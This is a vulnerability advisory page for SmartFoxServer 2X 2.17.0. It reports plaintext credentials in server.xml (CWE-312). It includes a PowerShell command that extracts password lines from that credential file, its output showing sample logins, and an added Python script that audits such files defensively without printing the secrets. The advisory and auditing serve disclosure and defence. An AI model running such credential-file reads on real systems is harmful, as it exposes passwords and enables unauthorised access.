SmartFoxServer 2X 2.17.0 – Credentials Disclosure

  • Author: LiquidWorm
    Date: 2021-02-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49527/
    # Exploit Title: SmartFoxServer 2X 2.17.0 - Credentials Disclosure
    # Date: 29.01.2021
    # Exploit Author: LiquidWorm
    # Vendor Homepage: https://www.smartfoxserver.com
    
    SmartFoxServer 2X 2.17.0 Credentials Disclosure
    
    
    Vendor: gotoAndPlay()
    Product web page: https://www.smartfoxserver.com
    Affected version: Server: 2.17.0
    Remote Admin: 3.2.6
    SmartFoxServer 2X, Pro, Basic
    
    Summary: SmartFoxServer (SFS) is a comprehensive SDK for
    rapidly developing multiplayer games and applications
    with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
    Windows Platform, Android, Java, C++ and more. SmartFoxServer
    comes with a rich set of features, an impressive
    documentation set, tens of examples with their source,
    powerful administration tools and a very active support
    forum. Born in 2004, and evolving continuously since
    then, today SmartFoxServer is the leading middleware to
    create large scale multiplayer games, MMOs and virtual
    communities. Thanks to its simplicity of use, versatility
    and performance, it currently powers hundreds of projects
    all over the world, from small chats and turn-based games
    to massive virtual worlds and realtime games.
    
    Desc: The application stores sensitive information in an
    unencrypted XML file called /config/server.xml. A local
    attacker with access to the current user's session can
    read the plain-text credentials from that file and use
    them to bypass authentication to the affected server.
    
    Tested on: Windows (all) 64bit installer
               Linux/Unix 64bit installer
               MacOS (10.8+) 64bit installer
               Java 1.8.0_281
               Python 3.9.1
               Python 2.7.14
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2021-5627
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5627.php
    
    CWE ID: CWE-312
    CWE URL: https://cwe.mitre.org/data/definitions/312.html
    
    
    29.01.2021
    
    --
    
    
    PS C:\Users\t00t\SmartFoxServer_2X\SFS2X\config> Get-Content server.xml | Select-String -Pattern passw -Context 1,0
    
    <login>sfsadmin</login>
    > <password>Waddup</password>
    <login>testingus</login>
    > <password>123456</password>
    <mailUser>username</mailUser>
    > <mailPass>password</mailPass>
    
    
    C:\Users\t00t\SmartFoxServer_2X\SFS2X\config>icacls server.xml
    server.xml NT AUTHORITY\SYSTEM:(I)(F)
     BUILTIN\Administrators:(I)(F)
     LAB42\t00t:(I)(F)
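
The two commands above are the manual version of a check a defender can automate: find credential-bearing elements in the XML and confirm who can read the file. The script below is an added example for this advisory, not the vendor's code and not the advisory's own PoC. The element names and values in its constructed sample mirror the Select-String output shown above, but the surrounding nesting (adminUsers/user, mailer, db) is assumed for illustration, since the advisory does not show the full server.xml layout. The script reports only the path and length of each cleartext secret, never the value, and on POSIX systems flags a file mode that grants read access to group or others (on Windows the equivalent check is the ACL, as the icacls output shows).

```python
"""Audit an XML configuration such as SFS2X's server.xml for cleartext credentials (CWE-312).

Added example; not the vendor's code or the advisory's PoC. Reports where secret-like
elements hold a value and whether the file's POSIX mode is too open; never prints secrets.
"""
import os
import re
import stat
import sys
import xml.etree.ElementTree as ET  # stdlib parser; input is a local config file, not untrusted data

# Element names that conventionally hold secrets. Extend for the config being audited.
SECRET_TAG = re.compile(r"(pass(word|wd)?|secret|token|apikey)$", re.IGNORECASE)

# Constructed sample: element names/values mirror the advisory's Select-String output,
# the nesting is assumed for illustration and is not SFS2X's real layout.
SAMPLE_SERVER_XML = """<serverSettings>
  <adminUsers>
    <user>
      <login>sfsadmin</login>
      <password>Waddup</password>
    </user>
    <user>
      <login>testingus</login>
      <password>123456</password>
    </user>
  </adminUsers>
  <mailer>
    <mailUser>username</mailUser>
    <mailPass>password</mailPass>
  </mailer>
  <db>
    <password></password>
  </db>
</serverSettings>
"""


def find_cleartext_secrets(xml_text):
    """Return a list of (element path, value length) for every secret-like element
    holding a non-empty value. Only the length is reported so the audit output
    does not become a second copy of the credentials."""
    root = ET.fromstring(xml_text)
    findings = []

    def walk(elem, parent_path):
        path = f"{parent_path}/{elem.tag}"
        value = (elem.text or "").strip()
        if SECRET_TAG.search(elem.tag) and value:
            findings.append((path, len(value)))
        for child in elem:
            walk(child, path)

    walk(root, "")
    return findings


def mode_is_too_open(mode):
    """True if a POSIX mode grants read access to group or others."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def audit_file(path):
    """Audit a config file on disk; returns (findings, too_open).
    The mode check is skipped on Windows, where ACLs (icacls) are authoritative."""
    with open(path, encoding="utf-8") as fh:
        findings = find_cleartext_secrets(fh.read())
    too_open = os.name != "nt" and mode_is_too_open(os.stat(path).st_mode)
    return findings, too_open


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results, too_open = audit_file(sys.argv[1])
        print(f"{sys.argv[1]}: readable by group/others: {too_open}")
    else:
        results = find_cleartext_secrets(SAMPLE_SERVER_XML)
    for elem_path, length in results:
        print(f"cleartext secret at {elem_path} ({length} chars)")
```

Run it with the path to a real server.xml to audit that file, or with no arguments to see the report on the built-in sample. Empty elements (the db password in the sample) are not reported, and the regex is deliberately narrow; widen it to the element names your own configuration uses.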